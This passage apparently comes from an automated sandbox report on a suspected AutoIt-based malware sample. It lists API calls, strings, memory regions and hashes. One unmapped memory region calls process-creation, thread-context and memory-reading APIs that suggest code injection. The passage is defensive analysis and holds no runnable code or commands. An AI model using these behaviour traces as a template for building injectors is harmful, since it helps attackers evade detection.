                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: 9f8d71b37262933d8a7991a5a1815ad9506c2775c7ba5cd0b99362731ea7f840
                                                      • Instruction ID: fa9379726252ece24b171f972b7fa8f52ef5f5712c3b146d79a59e2aa578c3eb
                                                      • Opcode Fuzzy Hash: 9f8d71b37262933d8a7991a5a1815ad9506c2775c7ba5cd0b99362731ea7f840
                                                      • Instruction Fuzzy Hash: 564107B2A4022CE7DB145B78AD49B7A3629FF05360F140125F541D61E2CB7ECA40FBA1

                                                       Control-flow Graph

                                                       • Control-flow graph rendered as an image in the original report; only the block list survived extraction. Function at 00F58D45 (blocks 00F58D45-00F590F9), which has no separate API listing in the report; its blocks call ReadFile, GetConsoleMode, ReadConsoleW and GetLastError, consistent with the C runtime's low-level read routine that falls back to ReadConsoleW for console handles.
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbcac471b9d4f522ce41373532f355f5851d90f1fcddf3df764ede6b7878f994
                                                      • Instruction ID: 7454deea413a67f08b93fe4d4820355009f2bae8965d0ca7c3c0fb70ad4d30e9
                                                      • Opcode Fuzzy Hash: dbcac471b9d4f522ce41373532f355f5851d90f1fcddf3df764ede6b7878f994
                                                      • Instruction Fuzzy Hash: 5CC1E175D08249EFCF159FA8CC41BADBFB4AF09321F044159EE15A72D2C7748A4AEB60

                                                       Control-flow Graph

                                                       • Control-flow graph rendered as an image in the original report; only the block list survived extraction. Function at 011625D0 (blocks 011625D0-011628D2) inside the 01160000 region that the dump lists as not PE-backed; its blocks call CreateFileW, VirtualAlloc, ReadFile, VirtualAlloc again, FindCloseChangeNotification (in kernel32 this export resolves to the same code as CloseHandle, so this is most likely the file handle being closed) and VirtualFree, with a back edge from the cleanup block at 011627EE to the CreateFileW block at 01162685, i.e. the open/read sequence is retried in a loop.
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011626A1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011628C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                      • Instruction ID: 8358ce48cee6610d6b4ceed285650a64ada07773ec120eaa9a91ca4576110d64
                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                      • Instruction Fuzzy Hash: AAA10A74E00209EBDB18CFA4C994FEEBBB9BF48305F208159E515BB280D77A9A50CB55

                                                       Control-flow Graph

                                                       • Control-flow graph rendered as an image in the original report: a single basic block 00F22C63-00F22CD3 that calls CreateWindowExW twice and ShowWindow twice.
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F22C91
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F22CB2
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F21CAD,?), ref: 00F22CC6
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F21CAD,?), ref: 00F22CCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: 65c30aed8acef1a232e64cef2a799872b108eddf3e5f8b8327be0bc1913ab2ff
                                                      • Instruction ID: 509f732b2049314cff861dc80dee1e271340629cc3dc37f098737711f78ab700
                                                      • Opcode Fuzzy Hash: 65c30aed8acef1a232e64cef2a799872b108eddf3e5f8b8327be0bc1913ab2ff
                                                      • Instruction Fuzzy Hash: 57F0DA76540298BAEB311717AC48EB73EBDEBC7F60B10005AF900A75A0C6625850FEB4

                                                       Control-flow Graph

                                                       • Control-flow graph rendered as an image in the original report; only the block list survived extraction. Function at 011623B0 (blocks 011623B0-0116258D) inside the non-PE-backed 01160000 region; it calls 01160000 and 011622A0 (the Sleep wrapper), then CreateFileW, VirtualAlloc, ReadFile, 011622E0, 011612A0, 01162330 and ExitProcess, and every API failure branches straight to the common exit block at 01162588.
                                                      APIs
                                                        • Part of subcall function 011622A0: Sleep.KERNELBASE(000001F4), ref: 011622B1
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011624C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: 4W0WY03XLIM6SHVFKL
                                                      • API String ID: 2694422964-623809923
                                                      • Opcode ID: 6d8cf56364320bf1f0de4441f4162c778d1654398ae88b6262e6291ed6ba7dc9
                                                      • Instruction ID: 79655055b22c556a8707e32ccc24ca1e1841907daad863afee6749f56998d6b3
                                                      • Opcode Fuzzy Hash: 6d8cf56364320bf1f0de4441f4162c778d1654398ae88b6262e6291ed6ba7dc9
                                                      • Instruction Fuzzy Hash: 95517231D05259DBEF15DBA4C814BEEBB78AF15304F004199E609BB2C0D7BA1B49CBA6

                                                      Control-flow Graph

                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F92C05
                                                      • DeleteFileW.KERNEL32(?), ref: 00F92C87
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F92C9D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F92CAE
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F92CC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$Copy
                                                      • String ID:
                                                      • API String ID: 3226157194-0
                                                      • Opcode ID: 3f749b4acce466bb0f23bcaecf8de2e312cff5d35e6a6ce696bead779cf12e88
                                                      • Instruction ID: 4f8d81d6634ab729df7c369feacc8970365ef197665d39d6ded8506296cf5775
                                                      • Opcode Fuzzy Hash: 3f749b4acce466bb0f23bcaecf8de2e312cff5d35e6a6ce696bead779cf12e88
                                                      • Instruction Fuzzy Hash: 8BB14F72D00129ABDF61DFA4CC85EDEBBBDEF48350F1040A6F509E6151EA349E44AF61

                                                       Control-flow Graph

                                                       • Control-flow graph rendered as an image in the original report; only the block list survived extraction. Function at 00F23B1C (blocks 00F23B1C-00F23B9B); its blocks call RegOpenKeyExW, RegQueryValueExW and RegCloseKey.
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F23B0F,SwapMouseButtons,00000004,?), ref: 00F23B40
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F23B0F,SwapMouseButtons,00000004,?), ref: 00F23B61
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00F23B0F,SwapMouseButtons,00000004,?), ref: 00F23B83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 130917eb1db4cf714a29d0c11c6f34dc75deb7b3b94c5372ceb138ff5fefbb91
                                                      • Instruction ID: 15c9be64fa4cdaf7512d710df768b4bcc3226e49cc1441c1b4761f19494c2de0
                                                      • Opcode Fuzzy Hash: 130917eb1db4cf714a29d0c11c6f34dc75deb7b3b94c5372ceb138ff5fefbb91
                                                      • Instruction Fuzzy Hash: 7A113CB5511218FFDB20DFA5EC84EAFBBB8EF44794B104559F805D7110D2359F40ABA0
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01161A5B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01161AF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01161B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                      • Instruction ID: be6ae8d070263e2d406f89512272dde43c60a2a6e3acd6a7b8f5c5d71dbfe6b9
                                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                      • Instruction Fuzzy Hash: 0A620F30A14258DBEB28CFA4CC50BDEB775EF58300F1091A9D10DEB294E7769E91CB59
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00F732B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: ce37803d7b7bb8fac1f35c683242e1d30e3573160224ed0d03480a92a999073d
                                                      • Instruction ID: 85bd166e68de0baa4c5906c52f91fa1c02a1e86caa1f5161c2f2fa12eaad1890
                                                      • Opcode Fuzzy Hash: ce37803d7b7bb8fac1f35c683242e1d30e3573160224ed0d03480a92a999073d
                                                      • Instruction Fuzzy Hash: 8DC28C75E00225DFCB24CF58E881AADB7B1FF08320F288169E955AB391D375ED41EB91
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00F2FE66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID:
                                                      • API String ID: 1385522511-0
                                                      • Opcode ID: 449d1eac9b6930dc602821f81d15ca823d16ae2b5872f6b81524ee2dcc45d426
                                                      • Instruction ID: 1919a625d2fe3013a1f0e79aa84a68164a413eb4e16c342788f02f1b63522fb2
                                                      • Opcode Fuzzy Hash: 449d1eac9b6930dc602821f81d15ca823d16ae2b5872f6b81524ee2dcc45d426
                                                      • Instruction Fuzzy Hash: F3B28D75A08361CFDB14CF18E490A2AB7F1BF89320F24486DE9858B351D775EC49EB92
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F633A2
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F23A04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                      • String ID: Line:
                                                      • API String ID: 2289894680-1585850449
                                                      • Opcode ID: 23af6d0ed45971f56abc37da3a3e640a1176b2e30458be72a1242e9aa5b40c57
                                                      • Instruction ID: 0f92ce7b4bf9ebcc39878b9ca46adb875e72a2b066430572fe004772efbf611c
                                                      • Opcode Fuzzy Hash: 23af6d0ed45971f56abc37da3a3e640a1176b2e30458be72a1242e9aa5b40c57
                                                      • Instruction Fuzzy Hash: 9931D6B1908324AAD725EB10EC45FEB77DCAF45710F00492AF59993191DF789A48EBC2
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00F40668
                                                        • Part of subcall function 00F432A4: RaiseException.KERNEL32(?,?,?,00F4068A,?,00FF1444,?,?,?,?,?,?,00F4068A,00F21129,00FE8738,00F21129), ref: 00F43304
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00F40685
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: bf077bf5f2ddc1a14a1658a7421fe7a92bd78aa7307106a7cd63dbf773f36e92
                                                      • Instruction ID: 551defe8682aecfcb635441788cb2f7c6534ddddd9ef6364015f0354cc5ceb22
                                                      • Opcode Fuzzy Hash: bf077bf5f2ddc1a14a1658a7421fe7a92bd78aa7307106a7cd63dbf773f36e92
                                                      • Instruction Fuzzy Hash: ADF0C234D0020D778B00BA65EC4AD9E7F6C9E40360B604531BE1996592EF75EB2AF981
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F9302F
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F93044
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 17d1b6986c55b435fedb450d8ec9aa7fb200ed1a098f8a290f1aba782766b33a
                                                      • Instruction ID: 55576b24c528813992a6d3672dbb1771e05cadd963b91fec4b9444a430950c7d
                                                      • Opcode Fuzzy Hash: 17d1b6986c55b435fedb450d8ec9aa7fb200ed1a098f8a290f1aba782766b33a
                                                      • Instruction Fuzzy Hash: 33D05E7290032C67DA20A7A5AC4EFCB3A6CDB04750F0002A1B755E2091DAB4D984CFE0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00FA82F5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00FA82FC
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00FA84DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                      • String ID:
                                                      • API String ID: 146820519-0
                                                      • Opcode ID: 2f68819733f8b5a346308ee89d6918418e9cf5eba6d70b03a82f370ce0c1b13b
                                                      • Instruction ID: cfc58d7aab1418b53861bafb5ad73bc60d8ab0d1b1d47c66f809b419e79cf75f
                                                      • Opcode Fuzzy Hash: 2f68819733f8b5a346308ee89d6918418e9cf5eba6d70b03a82f370ce0c1b13b
                                                      • Instruction Fuzzy Hash: B1128CB19083019FC714DF28C484B6ABBE1FF89364F04895DE8898B252CB75ED46DF92
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e7ee2cdc662536f4e8a4189da23bdc3171310ba64a792e4bdc0c2fe010e6f55e
                                                      • Instruction ID: f2e777048a51aa9b6c995c922c0b9302e6172db324bdf75a57787285c47a40bd
                                                      • Opcode Fuzzy Hash: e7ee2cdc662536f4e8a4189da23bdc3171310ba64a792e4bdc0c2fe010e6f55e
                                                      • Instruction Fuzzy Hash: 8451F271D00609ABCB109FB4CC59FAE7FB8AF45B22F140059FE04AB291C6759A09EB61
                                                      APIs
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F21BF4
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F21BFC
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F21C07
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F21C12
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F21C1A
                                                        • Part of subcall function 00F21BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F21C22
                                                        • Part of subcall function 00F21B4A: RegisterWindowMessageW.USER32(00000004,?,00F212C4), ref: 00F21BA2
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F2136A
                                                      • OleInitialize.OLE32 ref: 00F21388
                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00F624AB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: 33ed299c4dc34d11cbce5d00835d91d863aa6ce0d59f3284b20db5ba824b6ed3
                                                      • Instruction ID: 48ec303271ff3f67943d4f95b76c3ca9e629e05c142a68408784755a3ac7b62e
                                                      • Opcode Fuzzy Hash: 33ed299c4dc34d11cbce5d00835d91d863aa6ce0d59f3284b20db5ba824b6ed3
                                                      • Instruction Fuzzy Hash: 6971AAB5901208CFD384EF7AAD456763AE8BF9938475C822AD00ADB272EB354444FF54
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00F585CC,?,00FE8CC8,0000000C), ref: 00F58704
                                                      • GetLastError.KERNEL32(?,00F585CC,?,00FE8CC8,0000000C), ref: 00F5870E
                                                      • __dosmaperr.LIBCMT ref: 00F58739
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                      • String ID:
                                                      • API String ID: 490808831-0
                                                      • Opcode ID: 052ebe77cea5dbdaf42d325fddaaaa2a493a0650a42bcfcb72baf19ea4acbd21
                                                      • Instruction ID: 01407d68e4c02b36e2d5d9146818e2c56140334aae29c8a301742eba7a018a41
                                                      • Opcode Fuzzy Hash: 052ebe77cea5dbdaf42d325fddaaaa2a493a0650a42bcfcb72baf19ea4acbd21
                                                      • Instruction Fuzzy Hash: 4E010832E0562416D7646234AC4577E7B4A4F81BB6F290219EE18AB1D2DEA48C8AB190
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00F92CD4,?,?,?,00000004,00000001), ref: 00F92FF2
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F92CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F93006
                                                      • CloseHandle.KERNEL32(00000000,?,00F92CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F9300D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
